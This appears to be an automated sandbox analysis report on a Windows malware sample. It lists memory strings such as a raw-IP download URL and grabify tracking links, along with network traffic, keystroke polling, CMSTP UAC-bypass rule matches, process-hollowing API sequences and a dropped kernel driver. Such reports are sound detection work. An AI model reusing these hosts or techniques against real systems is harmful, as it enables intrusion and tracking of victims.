                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, 00000000.00000002.1322422247.0000000000475000.00000004.00000001.01000000.00000003.sdmp, svchost.exe, 00000004.00000002.2571150204.000001C3DC413000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571177550.000001C3DC467000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2570887017.00000042D3D76000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571466574.000001C3DC4CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571643710.000001C3DDE03000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571643710.000001C3DDDFF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://107.174.192.179/data/003
                    Source: tzutil.exe, 00000008.00000003.1556329975.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, bS4Vs_8188.sys.8.drString found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
                    Source: tzutil.exe, 00000008.00000003.1556329975.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, bS4Vs_8188.sys.8.drString found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
                    Source: powershell.exe, 0000000C.00000002.1595627160.00000262C8BB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1685956631.0000024A71131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: tzutil.exe, 00000008.00000003.1556329975.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, bS4Vs_8188.sys.8.drString found in binary or memory: http://ocsp.thawte.com0
                    Source: powershell.exe, 0000000E.00000002.1601005633.0000024A612E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 0000000C.00000002.1556862667.00000262B8D68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1601005633.0000024A612E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 0000000C.00000002.1556862667.00000262B8B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1601005633.0000024A610C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000000C.00000002.1556862667.00000262B8D68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1601005633.0000024A612E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 0000000E.00000002.1601005633.0000024A612E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000000E.00000002.1703256537.0000024A79A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co2l
                    Source: powershell.exe, 0000000C.00000002.1556862667.00000262B8B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1601005633.0000024A610C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 0000000E.00000002.1685956631.0000024A71131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000E.00000002.1685956631.0000024A71131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000E.00000002.1685956631.0000024A71131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: tzutil.exe, tzutil.exe, 00000008.00000002.1564260852.00000000008C0000.00000040.00000001.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.1564956187.0000000140010000.00000004.00000001.01000000.00000005.sdmp, w32tm.exe, w32tm.exe, 0000000B.00000002.1595461638.0000000140075000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                    Source: tzutil.exe, w32tm.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
                    Source: w32tm.exe, 0000000B.00000002.1595461638.0000000140075000.00000002.00000001.01000000.00000006.sdmp, w32tm.exe, 0000000B.00000003.1536509796.000000000209D000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000B.00000003.1543203507.000000000209C000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000B.00000003.1536437127.000000000209D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
Source: w32tm.exe, 0000000B.00000002.1595211576.00000000025DA000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000B.00000003.1593579542.00000000025D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exeRb
Source: powershell.exe, 0000000E.00000002.1601005633.0000024A612E8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: tzutil.exe, 00000008.00000003.1559395480.0000000002667000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/U7WLGD
Source: tzutil.exe, 00000008.00000002.1564825431.0000000002667000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/U7WLGDCC
Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, 00000000.00000002.1322422247.0000000000475000.00000004.00000001.01000000.00000003.sdmp, svchost.exe, 00000004.00000002.2571150204.000001C3DC413000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571177550.000001C3DC467000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571466574.000001C3DC4CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571643710.000001C3DDE03000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2571643710.000001C3DDDFF000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/ZATFQO
Source: svchost.exe, 00000004.00000002.2571466574.000001C3DC4CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/images/pixe
Source: svchost.exe, 00000004.00000002.2571466574.000001C3DC4CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/images/pixel.png
Source: svchost.exe, 00000004.00000002.2571466574.000001C3DC4CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/images/pixel.pngLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedExp
Source: powershell.exe, 0000000C.00000002.1595627160.00000262C8BB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1685956631.0000024A71131000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown | Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown | Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown | Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown | Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown | Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown | Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown | Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown | Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown | Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown | Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | HTTPS traffic detected: 104.26.8.202:443 -> 192.168.2.6:49689 version: TLS 1.2
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDB2310 WaitForSingleObject,RtlExitUserThread,GetAsyncKeyState,Sleep,OpenEventW,SetEvent,CloseHandle,RtlExitUserThread

                    System Summary

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.2.svchost.exe.1c3ddda0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_004112DC CreateEventW,GetModuleHandle64,GetProcAddress64,X64Call,WaitForSingleObject,ResetEvent,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_00406DB0 GetCurrentProcess,CreateProcessW,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDB0740 CreateProcessW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,LoadLibraryW,GetProcAddress,GetProcAddress,lstrcpyW,lstrcpyW,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,CreateEventW,RtlCreateUserThread,WaitForSingleObject,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtClose,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDA7940 GetCurrentProcess,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,TerminateProcess
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDB11A4 CloseHandle,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,TerminateProcess,CloseHandle,CloseHandle
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008C5D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | File created: C:\Windows\Temp\bS4Vs_8188.sys
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | File deleted: C:\Windows\Temp\bS4Vs_8188.sys
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_0040E1C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Code function: 0_2_004258F7
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDA7EF0
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDC5E50
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDBD600
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDA4DA0
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDA1000
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDC2340
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDB9D20
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDB0740
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDD6708
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDB2690
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDADE20
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDA7940
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDAE8C0
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDAA8C0
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDAB8B0
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDBD030
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDC2790
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDD3B2C
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDB12B0
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDCE9BC
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDCF964
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDBAD50
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDBC501
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDC9D1C
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDBA510
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDBC480
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDCCC2C
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDD5C5C
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDD53F8
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDACBF0
Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDC23B6
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008C2738
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008C5D7C
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A310B2
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A0B0B1
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009300D8
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008C20C0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009C10D0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A3002D
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00913020
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009E9020
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008D104C
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A0D040
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00907074
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_0090C06C
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00932198
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A3A196
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A1919B
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008C11CC
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008DC1D0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009111F0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009FB1F2
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A2C1D4
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009F611E
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009BC118
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A0C125
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00902118
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009D1113
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A1613B
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A1C117
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008DD148
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00916170
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_0090D294
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009FB294
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009192B8
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009BC2DB
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009342D8
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009322DC
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009BA2CC
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_009FF2F0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_008F923C
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_0091E224
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 8_2_00A1A252
